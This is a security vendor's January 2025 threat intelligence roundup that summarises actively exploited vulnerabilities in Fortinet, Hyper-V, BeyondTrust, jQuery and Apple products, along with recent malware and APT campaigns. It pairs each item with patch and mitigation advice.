CVE-2024-55591: 50,000 Internet-Facing Devices Affected by Fortinet Vulnerability

Welcome to Picus Security's monthly cyber threat intelligence roundup! 

Each month, our goal is to provide insights into the most recent and key malware attacks and vulnerability exploitation campaigns that could potentially affect your industry and region. Recognizing that a blog might not fully cater to your specific threat intelligence requirements, we're excited to introduce a new platform. This platform is crafted to deliver the most customized cyber threat intelligence, directly addressing your unique needs.

Our Picus CTI platform will enable you to identify threats targeting your region, understand your security posture in comparison to similar organizations, and receive easy-to-implement mitigation signatures from a variety of vendors. Additionally, it will offer a report that you can use to communicate with your peers or within your organization, ensuring that you are well-informed and prepared to address cyber threats effectively.

Latest Vulnerabilities and Exploits in January 2025

In this section, we will provide information on the latest vulnerabilities and exploits being targeted by adversaries in the wild, the affected products, and the available patches.

CVE-2024-55591: CISA Adds Fortinet FortiOS and FortiProxy Authentication Bypass Vulnerability to KEV Catalog

• Affected Vendor: Fortinet

• Affected Product:

• FortiOS (versions 7.0.0–7.0.16)

• FortiProxy (versions 7.0.0–7.0.19, 7.2.0–7.2.12)

• CVEs & Available Fixes:

• CVE-2024-55591 – Authentication Bypass via Node.js websocket module

• Fixes:

• FortiOS: Update to version 7.0.17 or later
• FortiProxy: Update to version 7.2.13 or later or 7.0.20 or later
• Workarounds: Remove public exposure of management interfaces or restrict access to trusted internal users.

On January 14, 2025, Fortinet issued a security advisory for CVE-2024-55591, a critical authentication bypass vulnerability in FortiOS (versions 7.0.0–7.0.16) and FortiProxy (versions 7.0.0–7.0.19 and 7.2.0–7.2.12). This vulnerability, actively exploited since November 2024, leverages alternate paths or channels to bypass authentication. Attackers exploited it by sending crafted requests to Node.js websocket modules, gaining super-admin access. This allowed them to modify firewall configurations, create accounts, and steal credentials.

Researchers documented the campaign’s phases: scanning, admin logins, account hijacking, and lateral movement, impacting 48,000 internet-facing devices globally (see Figure 1). Despite the January 14, 2025, CISA inclusion in the Known Exploited Vulnerabilities (KEV) catalog, many organizations remain exposed. CISA mandated fixes by January 21, 2025.

What to do next?

Admins should upgrade to FortiOS 7.0.17+/FortiProxy 7.2.13+ and restrict management interfaces to trusted networks. Workarounds include disconnecting interfaces from public access. Monitoring for indicators of compromise and unexpected logins from VPS hosting providers is critical.

Figure 1: 48,000 Internet-Facing Devices Vulnerable to CVE-2024-55591 by ShadowServer

CVE-2025-21333, CVE-2025-21334 & CVE-2025-21335: Microsoft Hyper-V Zero-Day Vulnerabilities Added to CISA KEV Catalog

Microsoft’s January 2025 security update addresses 161 vulnerabilities, including three critical zero-day flaws in Hyper-V’s NT Kernel Integration VSP (CVE-2025-21333, CVE-2025-21334, and CVE-2025-21335), which have been added to CISA's Known Exploited Vulnerabilities catalog.

These privilege escalation flaws, with a CVSS score of 7.8, allow attackers to gain SYSTEM-level privileges, potentially as part of post-compromise activity. The vulnerabilities affect Hyper-V's Virtualization Service Provider (VSP), a vital component enabling child partitions to interact with synthetic devices.

Microsoft has released patches as part of the January 2025 Security Update to mitigate these actively exploited vulnerabilities. It is crucial to apply these updates promptly. Federal agencies are required to implement the fixes by February 4, 2025. For more details and to download the patches, refer to Microsoft's official security update guide (links are embedded to corresponding CVEs in the first paragraph of this section).

CISA Adds Yet Another BeyondTrust Vulnerabilities to KEV Catalog Following Treasury Breach

• Affected Vendor: BeyondTrust

• Affected Products: Privileged Remote Access (PRA), Remote Support (RS)

• CVEs & Available Fixes:

  • CVE-2024-12686: Command injection vulnerability. Patch available for PRA and RS versions 22.1.x and higher.

  • CVE-2024-12356: Critical command injection vulnerability. Patch available for PRA and RS versions 22.1.x and higher.

The CISA has added a second vulnerability in BeyondTrust's Privileged Remote Access (PRA) and Remote Support (RS) products to its Known Exploited Vulnerabilities catalog. This vulnerability, identified as CVE-2024-12686, is a medium-severity command injection flaw that allows attackers with existing administrative privileges to execute operating system commands as the site user. BeyondTrust has released patches for all supported versions of PRA and RS 22.1.x and higher to address this issue. 

This addition follows a previous inclusion of another critical command injection vulnerability, CVE-2024-12356, affecting the same products. Both vulnerabilities were discovered during an investigation into a cyber incident in early December 2024, where attackers exploited these flaws to breach certain systems, including the U.S. Treasury Department. 

CISA strongly urges all organizations to prioritize timely remediation of these vulnerabilities to reduce exposure to potential cyberattacks. Federal agencies are required to apply the necessary patches by February 3, 2025, to secure their networks against active threats. 

For detailed information on the vulnerabilities and available patches, please refer to BeyondTrust's security advisories.

CVE-2020-11023: CISA Flags XSS Vulnerability in jQuery for Active Exploitation

CVE-2020-11023 is an XSS vulnerability in jQuery versions 1.0.3 to 3.4.1. It occurs when untrusted <option> elements are passed to DOM manipulation methods like .html() or .append(), allowing attackers to execute code in a user’s browser. Fixed in jQuery 3.5.0 (April 2020), it remains exploitable.

CISA added this vulnerability to its KEV catalog on January 23, 2025, after evidence of active exploitation by APT groups, including Chinese state-sponsored actors. Federal agencies must patch systems by February 13, 2025. CISA recommends organizations update to jQuery 3.5.0+ and use tools like DOMPurify for sanitization. Exploitation highlights risks of outdated libraries in critical systems.

Figure 2. CISA Adds CVE-2020-11023 jQuery Vulnerability to Its KEV Catalog on January 23, 2025

CVE-2025-24085: Apple Patches Zero-Day Vulnerability Across iOS, macOS, and More

• Affected Vendor: Apple

• Affected Products: 

• iPhones (XS and later), iPads (Pro, Air 3rd generation and later, Mini 5th generation and later, iPad 7th generation and later), macOS Sequoia, Apple Vision Pro, Apple TV (HD and 4K models), Apple Watch (Series 6 and later)

• CVEs:

• CVE-2025-24085: Use-after-free vulnerability in CoreMedia, CVE-2025-24107: Privilege escalation to root, CVE-2025-24159: Kernel code execution, CVE-2025-24128: Safari address bar spoofing, CVE-2025-24137: AirPlay remote code execution, CVE-2025-24145: User phone number exposure via system logs

• Fixes:

• iOS 18.3, iPadOS 18.3, macOS Sequoia 15.3, visionOS 2.3, tvOS 18.3, watchOS 11.3

Apple has addressed CVE-2025-24085, a zero-day vulnerability affecting iPhones, iPads, macOS Sequoia Macs, Vision Pro goggles, and Apple TVs. The flaw, a use-after-free() bug in the CoreMedia component, allows malicious apps to elevate privileges and gain system control. Apple fixed it with improved memory management in updates for iOS 18.3, macOS Sequoia 15.3, visionOS 2.3, tvOS 18.3, and watchOS 11.3. The exploit has been actively used against iOS devices before iOS 17.2. 

Additional vulnerabilities, such as CVE-2025-24107 (root access), CVE-2025-24159 (kernel privileges), and CVE-2025-24128 (Safari spoofing), were also patched. Apple recommends updating affected devices immediately to prevent further exploitation.

Top Threat Actors Observed in the Wild: January 2025

Here are the most active threat actors that have been observed in December in the wild.

IPany VPN Supply Chain Attack: SlowStepper Malware Targets South Korean Firms

• Victim Location: South Korea, Taiwan, Hong Kong, United States, New Zealand, Japan, China

• Sectors: Technology, VPN Provider, Semiconductor Company, Software Development, and other users of IPany VPN.

• Threat Actor: PlushDaemon APT (China-aligned hacking group).

• Actor Motivations: Cyber espionage, likely targeting sensitive industry data and intellectual property.

• Malware: SlowStepper (version 0.2.10 Lite).

South Korean VPN provider IPany suffered a supply chain attack by the "PlushDaemon" hacking group, which compromised its installer to deploy the 'SlowStepper' malware [1]. Hackers infiltrated IPany's development platform, embedding a backdoor in the installer file, infecting users upon installation. Researchers identified affected victims, including a semiconductor firm and a software developer, with infections dating back to November 2023. 

SlowStepper, a stealthy tool, collects sensitive system data, spies on users, and executes commands. The trojanized installer was removed in May 2024, but those infected must clean their systems. Indicators of compromise and full details are available here.

Microsoft Teams Vishing Attacks Exploit Employees for Remote Access

• Victim Location: Global, with a focus on organizations using Microsoft 365 subscriptions.

• Sectors: Various, including SMBs, enterprises, and organizations relying on managed service providers (MSPs).

• Threat Actor: STAC5143 and STAC5777 (linked to FIN7/Carbon Spider and ransomware group Storm-1811).

• Actor Motivation: Financial gain through ransomware deployment, credential theft, and system compromise.

• Malware: Black Basta ransomware, custom Python backdoors, and malicious DLL sideloading tools.

Security researchers have uncovered a new wave of phishing attacks targeting Microsoft Teams users [2]. Hackers, linked to ransomware groups STAC5143 and STAC5777, bombarded employees with spam emails, then posed as IT support via Teams. They tricked employees into granting remote access, leveraging tools like Microsoft Quick Assist and Teams’ built-in remote control. Using this access, attackers deployed malware, stole credentials, and installed ransomware like Black Basta.

These campaigns exploited Microsoft services for malicious file distribution, reducing detection. Researchers recommend restricting external Teams calls, limiting remote access applications, and training employees to recognize social engineering tactics. Indicators of compromise and detection methods are available in the Sophos report to help organizations mitigate these threats.

Recent Malware Attacks in January 2025

In December 2024, a variety of malware attacks were recorded, highlighting the persistent threat landscape. Below is a detailed list of the active malware incidents for the month. 

MintsLoader Campaign Spreads Malware via PowerShell and Fake CAPTCHA Prompts

• Victim Location: United States and Europe

• Sectors: Electricity, Oil and Gas, Legal Services

• Threat Actor: Unknown (linked to advanced cybercrime operations)

• Actor Motivations: Financial gain, data theft, and possibly geopolitical objectives

• Malware: 

  • MintsLoader (PowerShell-based loader)

  • StealC (information stealer)

  • BOINC (legitimate platform abused for malicious purposes)

Researchers have uncovered a campaign using the PowerShell-based MintsLoader malware to deploy StealC information stealer and BOINC [3]. Delivered through spam emails linking to malicious pages or JavaScript files, MintsLoader evades detection via obfuscation, sandbox checks, and a Domain Generation Algorithm for command-and-control (C2) communication. It targets sectors like energy and legal services in the U.S. and Europe.

The campaign abuses fake CAPTCHA pages, tricking users into executing malicious scripts. StealC, part of a malware-as-a-service model, avoids infecting machines in certain post-Soviet states. Concurrently, updated loaders like Astolfo Loader (Jinx V3) and GootLoader exploit SEO poisoning and compromised WordPress sites to distribute malware, showcasing the evolving sophistication of cyber threats.

Murdoc_Botnet: Mirai Variant Targets AVTECH and Huawei Devices in Global Campaign

• Victim Location: Malaysia, Thailand, Mexico, Indonesia, and globally where vulnerable devices are present.

• Sectors: Consumer electronics, IoT devices, and industries relying on AVTECH cameras and Huawei routers.

• Threat Actor: Unknown (linked to Mirai botnet campaigns).

• Actor Motivations: Establishing botnets for DDoS attacks and potential monetization through malicious network control.

• Malware: Murdoc_Botnet (a Mirai variant).

• CVEs: 

  • CVE-2024-7029 

  • CVE-2017-17215

The Murdoc_Botnet, a Mirai variant, targets vulnerable AVTECH cameras and Huawei HG532 routers in a campaign discovered by Qualys Threat Research in July 2024 [4]. Exploiting vulnerabilities (CVE-2024-7029, CVE-2017-17215), attackers deploy botnet samples via ELF binaries and bash scripts. The malware leverages GTFOBins to fetch, execute, and remove payloads. Over 1300 active IPs and 100+ command-and-control servers facilitate its distribution, affecting *nix systems primarily in Malaysia, Thailand, Mexico, and Indonesia. Organizations should update firmware, monitor processes, and avoid untrusted scripts to mitigate risks from Murdoc_Botnet and similar threats.

WP3.XYZ Malware Compromises Over 5,000 WordPress Sites with Rogue Admin Accounts

The WP3.XYZ malware campaign has compromised over 5,000 WordPress sites by creating rogue admin accounts, installing a malicious plugin, and stealing sensitive data [5]. The malware uses the wp3[.]xyz domain to exfiltrate data, including admin credentials and logs, disguised as image requests. Attackers create a rogue admin account, "wpx_admin," and activate a malicious plugin downloaded from the same domain. 

To mitigate risks, experts recommend 

• blocking the wp3[.]xyz domain, 
• reviewing admin accounts and plugins, 
• enabling CSRF protections, and 
• implementing multi-factor authentication 

to secure compromised sites and prevent further exploitation.

References

[1] The Hacker News, “PlushDaemon APT Targets South Korean VPN Provider in Supply Chain Attack,” The Hacker News, Jan. 22, 2025. Available: https://thehackernews.com/2025/01/plushdaemon-apt-targets-south-korean.html. [Accessed: Jan. 28, 2025]

[2] M. Parsons, C. Cowie, D. Souter, H. Neal, A. Bradshaw, and S. Gallagher, “Sophos MDR tracks two ransomware campaigns using ‘email bombing,’ Microsoft Teams ‘vishing,’” Sophos News, Jan. 21, 2025. Available: https://news.sophos.com/en-us/2025/01/21/sophos-mdr-tracks-two-ransomware-campaigns-using-email-bombing-microsoft-teams-vishing/. [Accessed: Jan. 28, 2025]

[3] The Hacker News, “MintsLoader Delivers StealC Malware and BOINC in Targeted Cyber Attacks,” The Hacker News, Jan. 27, 2025. Available: https://thehackernews.com/2025/01/mintsloader-delivers-stealc-malware-and.html. [Accessed: Jan. 27, 2025]

[4] D. Ahmed, “New Mirai Variant Murdoc_Botnet Launches DDoS Attacks via IoT Exploits,” Hackread - Latest Cybersecurity, Tech, Crypto & Hacking News, Jan. 21, 2025. Available: https://hackread.com/mirai-variant-murdoc-botnet-ddos-attacks-iot-exploits/. [Accessed: Jan. 28, 2025]

[5] B. Toulas, “WP3.XYZ malware attacks add rogue admins to 5,000+ WordPress sites,” BleepingComputer, Jan. 14, 2025. Available: https://www.bleepingcomputer.com/news/security/wp3xyz-malware-attacks-add-rogue-admins-to-5-000-plus-wordpress-sites/. [Accessed: Jan. 28, 2025]